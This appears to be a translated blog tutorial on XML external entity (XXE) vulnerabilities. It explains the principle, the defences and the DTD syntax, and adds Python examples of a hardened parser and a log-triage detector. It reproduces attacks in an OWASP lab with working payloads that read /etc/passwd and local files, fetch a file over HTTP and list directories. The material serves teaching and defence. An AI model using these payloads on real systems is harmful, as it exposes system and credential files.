Details Revealed: XXE Vulnerability Reproduction Steps and Security Protection Suggestions

Environmental preparation

This article is intended for network security learning only; please do not use it for any illegal acts, otherwise you bear the consequences yourself.

Attack-related introduction

Introduction:

XXE vulnerabilities occur in applications that use an XML parser to process user-supplied XML input. The attacker triggers the parser to load external entities by inserting malicious entity references into the XML document they submit. These external entities may point to the local file system or to remote resources reached over the network.

Principle:

XML parsers generally support entity references for referencing and reusing defined entities. The XXE vulnerability works because, by inserting malicious entity references into the XML input, an attacker can read sensitive file content, execute system commands, initiate remote requests, and so on. When the parser expands the malicious entity reference, the attacker obtains the wanted information through the parser's response.

Methods:

  • Inserting external entity references into XML input: by inserting malicious entity references into the user's XML input, an attacker can read the contents of local files or execute system commands.
  • Exploiting remote entities: attackers can point entity references at XML entities on remote servers to obtain sensitive information from remote resources.

Prerequisites:

  • An attacker can submit a crafted malicious XML input to a target application, and the application processes the input using an XML parser.

Defense method:

  • Input validation and filtering: perform strict input validation on XML input submitted by users, and filter out or remove potentially malicious content.
  • Disable entity resolution: disable external entity resolution in the XML parser so that malicious entities are never loaded.
  • Use a secure XML processing library: choose a security-audited XML processing library in which the XXE vulnerability has been fixed.
  • Minimize entity references in code: avoid the direct use of entity references in code as much as possible.
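The defensive measures above, turned into working code: the following Python example is added here and is not from the original post. It uses only the standard library's expat binding (`xml.parsers.expat`) and applies the second bullet as layered checks: reject any DOCTYPE from untrusted input, reject any entity declaration that carries a SYSTEM or PUBLIC identifier even if a DTD is allowed, and refuse external entity references at the parser level so no URI is ever fetched. The function names (`parse_untrusted_xml`, `screen`) and the sample documents are my own constructions; the file-read payload is the `/etc/passwd` one shown in the reproduction section of this post.

```python
"""Hardened XML parsing for untrusted input, standard library only (added example)."""
import xml.parsers.expat


class XXEAttempt(Exception):
    """Raised when untrusted XML tries to declare or load an external entity."""


def parse_untrusted_xml(data: bytes, allow_dtd: bool = False) -> dict:
    """Parse a flat document and return {tag: text} for the root's direct children.

    Raises XXEAttempt on a DOCTYPE (when allow_dtd is False) or on any entity
    declaration / reference that points outside the document.
    """
    parser = xml.parsers.expat.ParserCreate()
    result = {}
    depth = [0]   # current element nesting depth (list so handlers can mutate it)
    buf = []      # character data of the element currently being read

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # Layer 1: the simplest and strongest rule is "no DOCTYPE from clients".
        if not allow_dtd:
            raise XXEAttempt(f"DOCTYPE '{name}' rejected: DTDs are not accepted from clients")
        # Even when an internal DTD is tolerated, never fetch an external one.
        if sysid or pubid:
            raise XXEAttempt(f"external DTD rejected: {sysid or pubid}")

    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        # Layer 2: internal entities have a literal value; anything with a
        # SYSTEM/PUBLIC identifier (file:///..., http://...) points outside the document.
        if sysid is not None or pubid is not None:
            kind = "parameter" if is_param else "general"
            raise XXEAttempt(f"external {kind} entity '{name}' -> {sysid or pubid}")

    def on_external_entity_ref(context, base, sysid, pubid):
        # Layer 3: returning 0 makes expat abort instead of dereferencing the URI.
        return 0

    def on_start(name, attrs):
        depth[0] += 1
        buf.clear()

    def on_data(text):
        buf.append(text)

    def on_end(name):
        depth[0] -= 1
        if depth[0] == 1:   # a direct child of the root element just closed
            result[name] = "".join(buf).strip()

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_entity_ref
    parser.StartElementHandler = on_start
    parser.CharacterDataHandler = on_data
    parser.EndElementHandler = on_end
    parser.Parse(data, True)
    return result


def screen(data: bytes, allow_dtd: bool = False):
    """Return ('ok', parsed), ('blocked', reason) or ('malformed', reason).

    The reason string is what you would write to the application log.
    """
    try:
        return "ok", parse_untrusted_xml(data, allow_dtd)
    except XXEAttempt as exc:
        return "blocked", str(exc)
    except xml.parsers.expat.ExpatError as exc:
        return "malformed", str(exc)


# Constructed sample inputs: a harmless note, and the local-file payload from the post.
NOTE = b"<note><to>Jerry</to><from>Tom</from><head>Reminder</head></note>"
FILE_READ = (
    b'<?xml version="1.0"?>\n'
    b'<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>\n'
    b"<foo>&xxe;</foo>"
)

if __name__ == "__main__":
    print(screen(NOTE))
    print(screen(FILE_READ))
    print(screen(FILE_READ, allow_dtd=True))
```

With the default `allow_dtd=False` the payload is stopped at the DOCTYPE before the entity is even declared; with `allow_dtd=True` it is stopped at the entity declaration, and the logged reason includes the URI the attacker tried to load, which is the detail an incident responder wants to see.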

Simple XML document example

<?xml version="1.0"?>
<!DOCTYPE note[ 
<!ENTITY entity-name SYSTEM "URI/URL">
]>
<note>
  <to>杰瑞</to>
  <from>汤姆</from>
  <head>提醒</head>
  <body>你是个好人</body>
</note>

The following line-by-line analysis of the sample document is meant to help beginners understand it:

  • <?xml version="1.0"?>: This is the XML declaration part, which indicates that the version number of this XML document is 1.0.

  • <!DOCTYPE note[ : This opens the Document Type Definition (DTD). It states that the root element of the document is "note" and defines the related declarations inside the square brackets.

  • <!ENTITY entity-name SYSTEM "URI/URL">: This is an entity declaration. An entity can stand for a literal value, or it can reference an external resource. Here, "entity-name" is the name of the entity, "SYSTEM" indicates that the entity is external, and "URI/URL" is the location it is loaded from, which can be a file URI or a URL.

  • ]>: This is the closing tag of the Document Type Definition (DTD).

  • <note>: This is the root element of the document, which contains other child elements.

  • <to>杰瑞</to>: This is a child element carrying the receiver's information. Its tag is "to", and the text inside the tag is "杰瑞" (Jerry), indicating that the recipient's name is Jerry.

  • <from>汤姆</from>: This is another child element carrying the sender's information. Its tag is "from", and the text inside the tag is "汤姆" (Tom), indicating that the sender's name is Tom.

  • <head>提醒</head>: This is the third child element, representing the title of the note. Its tag is "head", and the text inside the tag is "提醒" (Reminder), indicating that the title of the note is "Reminder".

  • <body>你是个好人</body>: This is the last child element, representing the content of the note. Its tag is "body", and the text inside the tag is "你是个好人" (You are a good man), which is the body of the note.

  • </note>: This is the end tag of the root element, used to close the root element.

This sample document represents a simple note, with a receiver, a sender, a title and a body.

Attack reproduction (reference)

Target range

Target range: I use the range provided in the OWASP_Broken_Web_Apps virtual machine.

Attack payloads

1) Read local files through the file:/// protocol:
# Read the file 1.txt on the local F: drive
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY xxe SYSTEM "file:///F:/1.txt">
]>
<foo>&xxe;</foo>

Read sensitive files directly:

<!DOCTYPE foo [  
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]> 
<root>&xxe;</root>

2) Read remote files via the HTTP protocol:
# Read 1.txt from the remote host 192.168.100.58 (my own computer's IP, a local IP)
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY xxe SYSTEM "http://192.168.100.58/1.txt">
]>
<foo>&xxe;</foo>

3) List the contents of a directory: (I also failed to execute this attack statement; just know that it exists, and the previous ones are enough for general vulnerability testing)
<!DOCTYPE test [
<!ENTITY % file SYSTEM "file:///etc/">
<!ENTITY % eval "<!ENTITY % directory SYSTEM 'file:///%file;'>">
%eval;
%directory;
]>
<test>&directory;</test>
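From the defender's side, the three payload classes above share a few structural markers (a DOCTYPE, an ENTITY declaration with a SYSTEM or PUBLIC identifier, the URI scheme it points at, and `%name;` parameter-entity references). The following Python triage function is an added example, not part of the original post; it scans logged request bodies for those markers so a SOC can rank suspicious requests before anyone reads them by hand. The regexes, the function name `triage_xml_body` and the verdict labels are my own; the sample bodies are constructed from the payloads shown in this post plus one harmless document. Regex triage is a coarse filter for logs and WAF rules, not a substitute for disabling DTD and external-entity processing in the parser itself.

```python
"""Regex-based XXE triage of logged XML request bodies (added example)."""
import re

# Structural markers of the payload classes shown in this post.
DOCTYPE_RE = re.compile(rb"<!DOCTYPE\b", re.IGNORECASE)
# <!ENTITY [%] name SYSTEM|PUBLIC "uri"   (also matches inside a quoted entity
# value, which is how the nested declaration in the directory-listing payload is caught)
EXT_ENTITY_RE = re.compile(
    rb"<!ENTITY\s+(%\s*)?([\w.-]+)\s+(SYSTEM|PUBLIC)\s+(['\"])(.*?)\4",
    re.IGNORECASE | re.DOTALL,
)
PARAM_REF_RE = re.compile(rb"%[\w.-]+;")   # %name; parameter-entity references


def triage_xml_body(body: bytes) -> dict:
    """Summarise the XXE indicators found in one logged XML request body."""
    entities = []
    for m in EXT_ENTITY_RE.finditer(body):
        uri = m.group(5).decode("utf-8", "replace")
        entities.append({
            "name": m.group(2).decode("ascii", "replace"),
            "parameter": m.group(1) is not None,   # declared with a leading '%'
            "uri": uri,
            "scheme": uri.split(":", 1)[0].lower() if ":" in uri else "",
        })
    param_refs = len(PARAM_REF_RE.findall(body))
    if entities:
        verdict = "external-entity"   # a SYSTEM/PUBLIC entity is declared: treat as XXE
    elif DOCTYPE_RE.search(body):
        verdict = "dtd-present"       # no external entity, but DTDs from clients are unusual
    else:
        verdict = "clean"
    return {
        "verdict": verdict,
        "external_entities": entities,
        "schemes": sorted({e["scheme"] for e in entities if e["scheme"]}),
        "parameter_entity_refs": param_refs,
    }


# Constructed sample bodies, taken from the payloads shown in this post.
BENIGN = b"<note><to>Jerry</to><from>Tom</from></note>"
LOCAL_FILE = (
    b'<?xml version="1.0" encoding="UTF-8"?>\n'
    b"<!DOCTYPE foo [\n  <!ELEMENT foo ANY>\n"
    b'  <!ENTITY xxe SYSTEM "file:///F:/1.txt">\n]>\n<foo>&xxe;</foo>'
)
REMOTE_HTTP = (
    b"<!DOCTYPE foo [\n"
    b'  <!ENTITY xxe SYSTEM "http://192.168.100.58/1.txt">\n]>\n<foo>&xxe;</foo>'
)
DIR_LISTING = (
    b"<!DOCTYPE test [\n"
    b'<!ENTITY % file SYSTEM "file:///etc/">\n'
    b"<!ENTITY % eval \"<!ENTITY % directory SYSTEM 'file:///%file;'>\">\n"
    b"%eval;\n%directory;\n]>\n<test>&directory;</test>"
)

if __name__ == "__main__":
    for label, body in [("benign", BENIGN), ("local file", LOCAL_FILE),
                        ("remote http", REMOTE_HTTP), ("dir listing", DIR_LISTING)]:
        print(label, "->", triage_xml_body(body))
```

The `schemes` field is the most useful pivot for detection rules: `file` points at local reads, `http`/`https` at out-of-band requests to a host the attacker controls, and a non-zero `parameter_entity_refs` count together with nested declarations is the signature of the more advanced parameter-entity technique in payload 3.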


Origin blog.csdn.net/weixin_43263566/article/details/132481591